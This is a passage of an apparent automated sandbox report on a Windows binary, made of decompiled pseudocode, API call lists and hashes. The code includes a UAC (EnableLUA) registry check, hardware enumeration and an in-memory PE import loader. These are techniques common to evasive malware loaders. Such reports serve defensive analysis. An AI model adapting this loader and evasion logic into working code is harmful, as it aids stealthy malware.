                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1001D319
                                                                                                                                                                  Strings
                                                                                                                                                                  • EnableLUA, xrefs: 1001D2F6
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D2D4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                  • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
                                                                                                                                                                  • API String ID: 3677997916-2194944742
                                                                                                                                                                  • Opcode ID: f0ee11d3ca39d73e1a9700b9c1826854a912283dc671081fc300b6565e1263ac
                                                                                                                                                                  • Instruction ID: 8e6b4177a17e8aca07570e164a523334bb235141b85f1ba5573b08480178a58a
                                                                                                                                                                  • Opcode Fuzzy Hash: f0ee11d3ca39d73e1a9700b9c1826854a912283dc671081fc300b6565e1263ac
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D01FFB6D00219FBEB04DFD1CD88BEEB7B8EB44305F104059E611B6180D7759B44CB51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                                  			E100118DF(void* __ebx, void* __esi) {
                                                                                                                                                                  				void* _t1;
                                                                                                                                                                  				long _t5;
                                                                                                                                                                  				void* _t9;
                                                                                                                                                                  				void* _t11;
                                                                                                                                                                  				void* _t15;
                                                                                                                                                                  
                                                                                                                                                                  				_t9 = __ebx;
                                                                                                                                                                  				_t1 = TlsGetValue( *0x10334594);
                                                                                                                                                                  				_t16 = _t1;
                                                                                                                                                                  				if(_t1 != 0) {
                                                                                                                                                                  					_push( *0x10334590);
                                                                                                                                                                  					_t11 =  *(TlsGetValue( *0x10334594))();
                                                                                                                                                                  				}
                                                                                                                                                                  				_pop(_t15);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( *0x10334590);
                                                                                                                                                                  				 *((intOrPtr*)(E1001158A( *0x10335480)))();
                                                                                                                                                                  				_push(_t11);
                                                                                                                                                                  				L100117AC(_t9, _t11, _t15, _t16);
                                                                                                                                                                  				_t5 =  *0x10334594; // 0x20
                                                                                                                                                                  				if(_t5 != 0xffffffff) {
                                                                                                                                                                  					return TlsSetValue(_t5, 0);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t5;
                                                                                                                                                                  			}









                                                                                                                                                                  APIs
                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 100118EC
                                                                                                                                                                  • TlsGetValue.KERNEL32 ref: 100118FE
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 10011913
                                                                                                                                                                  • TlsSetValue.KERNEL32(00000020,00000000,1000EB29,00000000,?,?,00000001,?,?,1000EB8D,00000001,?,?,10331550,0000000C,1000EC47), ref: 1001192F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$__decode_pointer
                                                                                                                                                                  • String ID: tj
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 33%
                                                                                                                                                                  			E100199C0(void* __ebx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				char _v48;
                                                                                                                                                                  				char _v312;
                                                                                                                                                                  				char _v572;
                                                                                                                                                                  				char _v832;
                                                                                                                                                                  				char _v1092;
                                                                                                                                                                  				char _v1352;
                                                                                                                                                                  				char _v1368;
                                                                                                                                                                  				char _v1372;
                                                                                                                                                                  				intOrPtr _v1376;
                                                                                                                                                                  				intOrPtr _v1380;
                                                                                                                                                                  				signed int _v1384;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				intOrPtr _t74;
                                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                                  				void* _t85;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  				void* _t91;
                                                                                                                                                                  				void* _t94;
                                                                                                                                                                  				void* _t97;
                                                                                                                                                                  				void* _t116;
                                                                                                                                                                  				signed int _t150;
                                                                                                                                                                  				void* _t164;
                                                                                                                                                                  				void* _t168;
                                                                                                                                                                  				void* _t171;
                                                                                                                                                                  				void* _t174;
                                                                                                                                                                  				void* _t177;
                                                                                                                                                                  				void* _t180;
                                                                                                                                                                  				void* _t182;
                                                                                                                                                                  				void* _t183;
                                                                                                                                                                  				void* _t184;
                                                                                                                                                                  				void* _t185;
                                                                                                                                                                  				void* _t186;
                                                                                                                                                                  				intOrPtr _t187;
                                                                                                                                                                  				void* _t188;
                                                                                                                                                                  				void* _t189;
                                                                                                                                                                  				void* _t191;
                                                                                                                                                                  				void* _t193;
                                                                                                                                                                  				void* _t194;
                                                                                                                                                                  				void* _t196;
                                                                                                                                                                  				void* _t197;
                                                                                                                                                                  				void* _t199;
                                                                                                                                                                  				void* _t200;
                                                                                                                                                                  				void* _t202;
                                                                                                                                                                  				void* _t203;
                                                                                                                                                                  
                                                                                                                                                                  				_t116 = __ebx;
                                                                                                                                                                  				 *[fs:0x0] = _t187;
                                                                                                                                                                  				_t188 = _t187 - 0x558;
                                                                                                                                                                  				_v1384 = 0;
                                                                                                                                                                  				_t74 = E100031F0( &_v1368, __eflags);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v1376 = 0;
                                                                                                                                                                  				_v48 = 0;
                                                                                                                                                                  				_v1372 = 0;
                                                                                                                                                                  				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E1002314A, 0xffffffff);
                                                                                                                                                                  				_v1380 = _t74;
                                                                                                                                                                  				if(_v1380 != 0xffffffff) {
                                                                                                                                                                  					E1000CF80(_t164,  &_v44, 0, 0x1c);
                                                                                                                                                                  					_t189 = _t188 + 0xc;
                                                                                                                                                                  					_v44 = 0x1c;
                                                                                                                                                                  					while(1) {
                                                                                                                                                                  						_t148 = _v1376;
                                                                                                                                                                  						_t80 = _v1380;
                                                                                                                                                                  						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
                                                                                                                                                                  						if(_t80 == 0) {
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						E1000CF80(_t164,  &_v1352, 0, 0x514);
                                                                                                                                                                  						_push( &_v1372);
                                                                                                                                                                  						_push( &_v48);
                                                                                                                                                                  						_push(0);
                                                                                                                                                                  						_t191 = _t189 + 0xc - 0x1c;
                                                                                                                                                                  						_t182 =  &_v44;
                                                                                                                                                                  						memcpy(_t191, _t182, 7 << 2);
                                                                                                                                                                  						_t168 = _t182 + 0xe;
                                                                                                                                                                  						_push(_v1380);
                                                                                                                                                                  						_t85 = E100197E0(_t116, _t182);
                                                                                                                                                                  						_t193 = _t191 + 0x38;
                                                                                                                                                                  						_t213 = _t85;
                                                                                                                                                                  						if(_t85 != 0) {
                                                                                                                                                                  							E1000D1F0(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
                                                                                                                                                                  							_push(_v48);
                                                                                                                                                                  							E1000CA40(_t116, _t168, _t182, _t213);
                                                                                                                                                                  							_t193 = _t193 + 0x10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push( &_v1372);
                                                                                                                                                                  						_push( &_v48);
                                                                                                                                                                  						_push(7);
                                                                                                                                                                  						_t194 = _t193 - 0x1c;
                                                                                                                                                                  						_t183 =  &_v44;
                                                                                                                                                                  						memcpy(_t194, _t183, 7 << 2);
                                                                                                                                                                  						_t171 = _t183 + 0xe;
                                                                                                                                                                  						_push(_v1380);
                                                                                                                                                                  						_t88 = E100197E0(_t116, _t183);
                                                                                                                                                                  						_t196 = _t194 + 0x38;
                                                                                                                                                                  						_t214 = _t88;
                                                                                                                                                                  						if(_t88 != 0) {
                                                                                                                                                                  							E1000D1F0(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
                                                                                                                                                                  							_push(_v48);
                                                                                                                                                                  							E1000CA40(_t116, _t171, _t183, _t214);
                                                                                                                                                                  							_t196 = _t196 + 0x10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push( &_v1372);
                                                                                                                                                                  						_push( &_v48);
                                                                                                                                                                  						_push(0x16);
                                                                                                                                                                  						_t197 = _t196 - 0x1c;
                                                                                                                                                                  						_t184 =  &_v44;
                                                                                                                                                                  						memcpy(_t197, _t184, 7 << 2);
                                                                                                                                                                  						_t174 = _t184 + 0xe;
                                                                                                                                                                  						_push(_v1380);
                                                                                                                                                                  						_t91 = E100197E0(_t116, _t184);
                                                                                                                                                                  						_t199 = _t197 + 0x38;
                                                                                                                                                                  						_t215 = _t91;
                                                                                                                                                                  						if(_t91 != 0) {
                                                                                                                                                                  							E1000D1F0(_t116, _t174, _t184,  &_v832, _v48, _v1372);
                                                                                                                                                                  							_push(_v48);
                                                                                                                                                                  							E1000CA40(_t116, _t174, _t184, _t215);
                                                                                                                                                                  							_t199 = _t199 + 0x10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push( &_v1372);
                                                                                                                                                                  						_push( &_v48);
                                                                                                                                                                  						_push(0xc);
                                                                                                                                                                  						_t200 = _t199 - 0x1c;
                                                                                                                                                                  						_t185 =  &_v44;
                                                                                                                                                                  						memcpy(_t200, _t185, 7 << 2);
                                                                                                                                                                  						_t177 = _t185 + 0xe;
                                                                                                                                                                  						_push(_v1380);
                                                                                                                                                                  						_t94 = E100197E0(_t116, _t185);
                                                                                                                                                                  						_t202 = _t200 + 0x38;
                                                                                                                                                                  						_t216 = _t94;
                                                                                                                                                                  						if(_t94 != 0) {
                                                                                                                                                                  							E1000D1F0(_t116, _t177, _t185,  &_v572, _v48, _v1372);
                                                                                                                                                                  							_push(_v48);
                                                                                                                                                                  							E1000CA40(_t116, _t177, _t185, _t216);
                                                                                                                                                                  							_t202 = _t202 + 0x10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push( &_v1372);
                                                                                                                                                                  						_push( &_v48);
                                                                                                                                                                  						_push(8);
                                                                                                                                                                  						_t203 = _t202 - 0x1c;
                                                                                                                                                                  						_t186 =  &_v44;
                                                                                                                                                                  						memcpy(_t203, _t186, 7 << 2);
                                                                                                                                                                  						_t164 = _t186 + 0xe;
                                                                                                                                                                  						_push(_v1380);
                                                                                                                                                                  						_t97 = E100197E0(_t116, _t186);
                                                                                                                                                                  						_t189 = _t203 + 0x38;
                                                                                                                                                                  						_t217 = _t97;
                                                                                                                                                                  						if(_t97 != 0) {
                                                                                                                                                                  							E1000D1F0(_t116, _t164, _t186,  &_v312, _v48, _v1372);
                                                                                                                                                                  							_push(_v48);
                                                                                                                                                                  							E1000CA40(_t116, _t164, _t186, _t217);
                                                                                                                                                                  							_t189 = _t189 + 0x10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_v1376 = _v1376 + 1;
                                                                                                                                                                  						E10003390( &_v1368,  &_v1352, _t217,  &_v1352);
                                                                                                                                                                  					}
                                                                                                                                                                  					__imp__SetupDiDestroyDeviceInfoList(_v1380);
                                                                                                                                                                  				}
                                                                                                                                                                  				E10003220(_a4, _t148, __eflags,  &_v1368);
                                                                                                                                                                  				_t150 = _v1384 | 0x00000001;
                                                                                                                                                                  				__eflags = _t150;
                                                                                                                                                                  				_v1384 = _t150;
                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                  				E10003300( &_v1368);
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _a4;
                                                                                                                                                                  			}





















































                                                                                                                                                                  APIs
                                                                                                                                                                  • SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 10019A1F
                                                                                                                                                                  • _memset.LIBCMT ref: 10019A40
                                                                                                                                                                  • SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A61
                                                                                                                                                                  • _memset.LIBCMT ref: 10019A7D
                                                                                                                                                                    • Part of subcall function 100197E0: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 1001980C
                                                                                                                                                                    • Part of subcall function 100197E0: GetLastError.KERNEL32 ref: 10019812
                                                                                                                                                                    • Part of subcall function 100197E0: _memset.LIBCMT ref: 1001983E
                                                                                                                                                                    • Part of subcall function 100197E0: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019864
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  • SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019C5B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3323326763-0
                                                                                                                                                                  • Opcode ID: be00d84646f1b510e2cc436dbf2af7cf9ed6e47a91e4a853b8a6da5aaf38a255
                                                                                                                                                                  • Instruction ID: feca0670d641fe6b0cb65ea07884cbe10e98eaee29bba7d3bd3bbacfe8845874
                                                                                                                                                                  • Opcode Fuzzy Hash: be00d84646f1b510e2cc436dbf2af7cf9ed6e47a91e4a853b8a6da5aaf38a255
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C81A5B6D006189BDB14DBA8DC51FEF7378EB48315F048198E509B7281EB35AA85CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                                                  			E1001ABC0(intOrPtr* _a4) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				intOrPtr* _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				void* _v24;
                                                                                                                                                                  				void* _v28;
                                                                                                                                                                  				signed int* _v32;
                                                                                                                                                                  				void* _v36;
                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				void* _t108;
                                                                                                                                                                  				void* _t110;
                                                                                                                                                                  				void* _t113;
                                                                                                                                                                  				void* _t115;
                                                                                                                                                                  				void* _t122;
                                                                                                                                                                  				void* _t130;
                                                                                                                                                                  				void _t132;
                                                                                                                                                                  				void _t137;
                                                                                                                                                                  				void* _t144;
                                                                                                                                                                  				void* _t159;
                                                                                                                                                                  				void* _t194;
                                                                                                                                                                  				void* _t201;
                                                                                                                                                                  				void* _t202;
                                                                                                                                                                  				void* _t203;
                                                                                                                                                                  				void* _t204;
                                                                                                                                                                  
                                                                                                                                                                  				_t2 = _a4 + 4; // 0xe90575c0
                                                                                                                                                                  				_v20 =  *_t2;
                                                                                                                                                                  				_v16 = 1;
                                                                                                                                                                  				_v12 =  *_a4 + 0x80;
                                                                                                                                                                  				if( *((intOrPtr*)(_v12 + 4)) != 0) {
                                                                                                                                                                  					_v8 = _v20 +  *_v12;
                                                                                                                                                                  					while(1) {
                                                                                                                                                                  						_t108 = IsBadReadPtr(_v8, 0x14);
                                                                                                                                                                  						__eflags = _t108;
                                                                                                                                                                  						if(_t108 != 0) {
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t110 = _v8;
                                                                                                                                                                  						__eflags =  *(_t110 + 0xc);
                                                                                                                                                                  						if( *(_t110 + 0xc) == 0) {
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t18 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                  						_t23 = _a4 + 0x24; // 0xf3c7e850
                                                                                                                                                                  						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18);
                                                                                                                                                                  						_t204 = _t203 + 8;
                                                                                                                                                                  						_v36 = _t113;
                                                                                                                                                                  						__eflags = _v36;
                                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                                  							_t28 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                                  							_push(4 +  *_t28 * 4);
                                                                                                                                                                  							_t32 = _a4 + 8; // 0x98
                                                                                                                                                                  							_push( *_t32);
                                                                                                                                                                  							_t115 = E1000E078(_t144,  *_t32, _t201, _t202, __eflags);
                                                                                                                                                                  							_t203 = _t204 + 8;
                                                                                                                                                                  							_v28 = _t115;
                                                                                                                                                                  							__eflags = _v28;
                                                                                                                                                                  							if(_v28 != 0) {
                                                                                                                                                                  								 *(_a4 + 8) = _v28;
                                                                                                                                                                  								_t45 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                                  								_t47 = _a4 + 8; // 0x98
                                                                                                                                                                  								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
                                                                                                                                                                  								_t52 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                                  								 *(_a4 + 0xc) =  *_t52 + 1;
                                                                                                                                                                  								__eflags =  *_v8;
                                                                                                                                                                  								if( *_v8 == 0) {
                                                                                                                                                                  									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                  									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                  									__eflags = _t122;
                                                                                                                                                                  									_v24 = _t122;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_v32 = _v20 +  *_v8;
                                                                                                                                                                  									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                  								}
                                                                                                                                                                  								while(1) {
                                                                                                                                                                  									__eflags =  *_v32;
                                                                                                                                                                  									if( *_v32 == 0) {
                                                                                                                                                                  										break;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags =  *_v32 & 0x80000000;
                                                                                                                                                                  									if(( *_v32 & 0x80000000) == 0) {
                                                                                                                                                                  										_v40 = _v20 +  *_v32;
                                                                                                                                                                  										_t88 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                  										_t130 = _v40 + 2;
                                                                                                                                                                  										__eflags = _t130;
                                                                                                                                                                  										_t92 = _a4 + 0x28; // 0xc483ffff
                                                                                                                                                                  										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
                                                                                                                                                                  										_t203 = _t203 + 0xc;
                                                                                                                                                                  										 *_v24 = _t132;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t78 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                  										_t82 = _a4 + 0x28; // 0xc483ffff
                                                                                                                                                                  										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
                                                                                                                                                                  										_t203 = _t203 + 0xc;
                                                                                                                                                                  										 *_v24 = _t137;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags =  *_v24;
                                                                                                                                                                  									if( *_v24 != 0) {
                                                                                                                                                                  										_v32 =  &(_v32[1]);
                                                                                                                                                                  										_t194 = _v24 + 4;
                                                                                                                                                                  										__eflags = _t194;
                                                                                                                                                                  										_v24 = _t194;
                                                                                                                                                                  										continue;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_v16 = 0;
                                                                                                                                                                  										break;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _v16;
                                                                                                                                                                  								if(_v16 != 0) {
                                                                                                                                                                  									_t159 = _v8 + 0x14;
                                                                                                                                                                  									__eflags = _t159;
                                                                                                                                                                  									_v8 = _t159;
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t98 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                  								_t101 = _a4 + 0x2c; // 0x75c08504
                                                                                                                                                                  								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
                                                                                                                                                                  								SetLastError(0x7f);
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t36 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                  							_t39 = _a4 + 0x2c; // 0x75c08504
                                                                                                                                                                  							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
                                                                                                                                                                  							SetLastError(0xe);
                                                                                                                                                                  							_v16 = 0;
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						SetLastError(0x7e);
                                                                                                                                                                  						_v16 = 0;
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					return _v16;
                                                                                                                                                                  				}
                                                                                                                                                                  				return 1;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001AC12
                                                                                                                                                                  • SetLastError.KERNEL32(0000007E), ref: 1001AC54
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4100373531-0
                                                                                                                                                                  • Opcode ID: ef285a2fe75f96ee2784fecbbb44db874fd234a3fa6e90b292717812d422f0a0
                                                                                                                                                                  • Instruction ID: 7fa1d4eba7a4407511cddb994e7de49554f5151831751da13495a7fdaa87bcf2
                                                                                                                                                                  • Opcode Fuzzy Hash: ef285a2fe75f96ee2784fecbbb44db874fd234a3fa6e90b292717812d422f0a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B81A374A00209EFDB04CF94D981AAEB7F1FF89355F248158E919AB351C735EA82CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 0043932A
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00020019), ref: 00439365
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000), ref: 00439381
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000), ref: 0043938E
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000), ref: 0043939B
                                                                                                                                                                    • Part of subcall function 004321E8: RegCloseKey.ADVAPI32(00000000), ref: 0043233A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                  • Opcode ID: fbe6d85ac30a0dc54d85a6d165344f811891950168cf86b2a0354d556b1f643b
                                                                                                                                                                  • Instruction ID: b40024304262db2bdc02b3053b396216f17f0df8e61ece4bed7a662dd508e462
                                                                                                                                                                  • Opcode Fuzzy Hash: fbe6d85ac30a0dc54d85a6d165344f811891950168cf86b2a0354d556b1f643b
                                                                                                                                                                  • Instruction Fuzzy Hash: D4414DB2C0022DFFCF11AF94DD819AEFA79AF0C754F11527AEA01B6261C7B54E409B94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(8007000D,00000000,?,?,00000000,00000000,8007000D,8007000D,00401C5F,?,00430A87,8007000D,?,00000000,00000000,8007000D), ref: 0043404A
                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,8007000D,8007000D,00401C5F,?,00430A87,8007000D,?,00000000,00000000,8007000D), ref: 00434056
                                                                                                                                                                    • Part of subcall function 00431231: GetProcessHeap.KERNEL32(00000000,0000005A,?,00434024,0000005A,8007000D,8007000D,00401C5F,?,00430A87,8007000D,?,00000000,00000000,8007000D), ref: 00431239
                                                                                                                                                                    • Part of subcall function 00431231: HeapSize.KERNEL32(00000000,?,00434024,0000005A,8007000D,8007000D,00401C5F,?,00430A87,8007000D,?,00000000,00000000,8007000D), ref: 00431240
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                  • API String ID: 3662877508-3612885251
                                                                                                                                                                  • Opcode ID: f8761297480b75186cd078af75affc56b98174bef9d8f624ea1d0bb67533dec0
                                                                                                                                                                  • Instruction ID: 1e3e032e7f16b004de5db61f72d2123e875419da1d3f6caca04779606935e5e0
                                                                                                                                                                  • Opcode Fuzzy Hash: f8761297480b75186cd078af75affc56b98174bef9d8f624ea1d0bb67533dec0
                                                                                                                                                                  • Instruction Fuzzy Hash: 92312732300615ABDB148E698C44AEB77E9EF88364F11522BFE11DB2A0E735EC4187D9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(000000F8,00000000,00000000,00000000,?,00402308,000000F8,000000F8,000002A8,00000000,00000001,000000F8), ref: 00403AD3
